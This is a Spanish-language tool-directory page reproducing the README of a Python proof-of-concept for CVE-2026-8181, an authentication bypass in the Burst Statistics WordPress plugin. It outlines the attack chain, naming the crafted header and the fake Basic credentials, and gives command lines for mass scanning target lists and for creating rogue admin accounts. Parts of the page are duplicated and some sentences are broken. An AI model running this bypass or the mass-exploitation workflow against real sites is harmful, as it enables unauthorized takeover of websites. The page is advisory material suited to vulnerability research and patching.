Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-8181 — PoC de CVE-2026-8181: Bypass de autenticación en Burst Statistics (3.4.0–3.4.1.1). Herramienta Python — escaneos de objetivo único y múltiple, trabajadores en hilos, informes TXT. Solo para pruebas autorizadas. Mantenedor: mürrez. | Kitploit
Herramientas/GitHubGitHub/murrez/cve-2026-8181
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAutenticación
GitHubmurrez/cve-2026-8181

CVE-2026-8181

PoC de CVE-2026-8181: Bypass de autenticación en Burst Statistics (3.4.0–3.4.1.1). Herramienta Python — escaneos de objetivo único y múltiple, trabajadores en hilos, informes TXT. Solo para pruebas autorizadas. Mantenedor: mürrez.

Ver Repositorio
3hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Introducción escrita EN
Introducción escrita TR
Frase EN/TR



CVE CVSS WP Python

EN: PoC controlado y notas técnicas breves para pruebas de seguridad autorizadas del bypass de autenticación en Burst Statistics. PoC controlado y notas técnicas breves para del bypass de autenticación en .



ES:
pruebas de seguridad autorizadas
Burst Statistics

Resumen del proyecto

Inglés

CampoDetalle
¿Qué?Bypass de autenticación (CWE-287) en Burst Statistics: cabeceras diseñadas pueden escalar solicitudes REST a contexto de administrador completo.
VersionesVulnerable: 3.4.0, 3.4.1, 3.4.1.1 · Usar: 3.4.2 o superior
GravedadCVSS ~9.8 (Crítico); remoto, sin autenticación en condiciones aplicables.
Este repoCVE-2026-8181.py — automatización de laboratorio: objetivo único, lista masiva, pool de hilos, salida TXT selectiva.

Nota: La cifra de 200,000+ instalaciones activas en WordPress.org es la base de usuarios total del plugin — no significa que todos los sitios ejecuten una versión vulnerable. El impacto real requiere verificar versión + entorno (disponibilidad de HTTP / contraseña de aplicación, etc.).

Español

CampoDetalle
¿Qué?Bypass de autenticación (CWE-287) en Burst Statistics: cabeceras diseñadas pueden escalar solicitudes REST a contexto de administrador completo.
VersionesVulnerable: 3.4.0, 3.4.1, 3.4.1.1 · Usar: 3.4.2 o superior
GravedadCVSS ~9.8 (Crítico); remoto, sin autenticación en condiciones aplicables.
Este repoCVE-2026-8181.py — automatización de laboratorio: objetivo único, lista masiva, pool de hilos, salida TXT selectiva.

Nota: La cifra de 200,000+ instalaciones activas en WordPress.org es la base de usuarios total del plugin — no significa que todos los sitios ejecuten una versión vulnerable. El impacto real requiere verificar versión + entorno (disponibilidad de HTTP / contraseña de aplicación, etc.).


Visuales

Inglés

GitHub-Flavored Markdown no incrusta GIFs binarios sin un archivo en el repo. Los fragmentos Typing SVG anteriores (CDN) simulan movimiento. Para agregar tu propia captura de pantalla:

root@kitploit:~
![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/HEAD/assets/demo.gif)

Español

GitHub-Flavored Markdown no incrusta GIFs binarios sin un archivo en el repo. Los fragmentos Typing SVG anteriores (CDN) simulan movimiento. Para agregar tu propia captura de pantalla:

root@kitploit:~
![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/HEAD/assets/demo.gif)

Cadena de ataque (Mermaid)

Inglés — etiquetas del diagrama

root@kitploit:~
flowchart LR
  A[Solicitud del cliente] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Rama mal manejada| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: contexto de administrador completo]

Español — mismo flujo

root@kitploit:~
flowchart LR
  A[Solicitud] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Rama incorrecta| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: contexto de administrador completo]

Características de la herramienta

Inglés

CaracterísticaDescripción
Objetivo único-u URL base
Lista masiva-f targets.txt (una URL por línea; comentarios con #)
Concurrencia-j N trabajadores (con límite)
Archivo combinado-o archivo.txt — con -f, solo se añaden los exploits exitosos
Archivos por host--output-dir — solo éxitos obtienen host.txt (fallos omitidos)
Nuevo admin--create-user — usuario aleatorio vía REST (la contraseña aparece en el informe)
TLS (lab)-k desactiva verificación de certificados (solo labs de confianza)

Con -f, -o y --output-dir son mutuamente excluyentes.

Español

CaracterísticaDescripción
Objetivo único-u URL base
Lista masiva-f targets.txt (una URL por línea; comentarios con #)
Concurrencia-j N trabajadores (con límite)
Archivo combinado-o archivo.txt — con -f, solo se añaden los exploits exitosos
Archivos por host--output-dir — solo éxitos obtienen host.txt (fallos omitidos)
Nuevo admin--create-user — usuario aleatorio vía REST (la contraseña aparece en el informe)
TLS (lab)-k desactiva verificación de certificados (solo labs de confianza)

Con -f, -o y --output-dir son mutuamente excluyentes.


Instalación

root@kitploit:~
pip3 install requests urllib3

Ejemplos de uso

Inglés

root@kitploit:~
# Sitio único, archivo de informe
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k

# Sitio único + nuevo admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k

# Lista masiva + archivo combinado (solo éxitos)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k

# Lista masiva + archivos por host en carpeta (solo éxitos)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

Español

root@kitploit:~
# Sitio único, archivo de informe
python3 CVE-2026-8181.py -u http://lab.local -U admin -o informe.txt -k

# Sitio único + nuevo admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o informe.txt -k

# Lista masiva + archivo combinado (solo éxitos)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o exitos.txt -k

# Lista masiva + archivos por host en carpeta (solo éxitos)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./resultados -k

Campo Password: vacío

Inglés

Un bypass exitoso no filtra la contraseña real del usuario víctima — la contraseña Basic en el PoC es falsa. La línea Password: permanece vacía a menos que --create-user haya creado una nueva cuenta (entonces se escribe la contraseña generada).

Español

Un bypass exitoso no filtra la contraseña real del usuario víctima — la contraseña Basic en el PoC es falsa. La línea Password: permanece vacía a menos que --create-user haya creado una nueva cuenta (entonces se escribe la contraseña generada).


Referencias

Inglés

  • Burst Statistics — Directorio de plugins de WordPress
  • A menudo citado en divulgación coordinada: Wordfence Threat Intelligence, PRISM
  • CVE: MITRE CVE-2026-8181 · NVD

Español

  • Burst Statistics — Directorio de plugins de WordPress
  • A menudo citado en divulgación coordinada: Wordfence Threat Intelligence, PRISM
  • CVE: MITRE CVE-2026-8181 · NVD

Descargo de responsabilidad

Inglés

Solo para evaluaciones autorizadas por escrito y tu propio laboratorio. El uso no autorizado es ilegal en muchas jurisdicciones. Los autores y el mantenedor de este README no asumen ninguna responsabilidad por el mal uso.

Español

Solo para evaluaciones autorizadas por escrito y tu propio laboratorio. El uso no autorizado es ilegal en muchas jurisdicciones. Los autores y el mantenedor de este README no asumen ninguna responsabilidad por el mal uso.

Descargar herramienta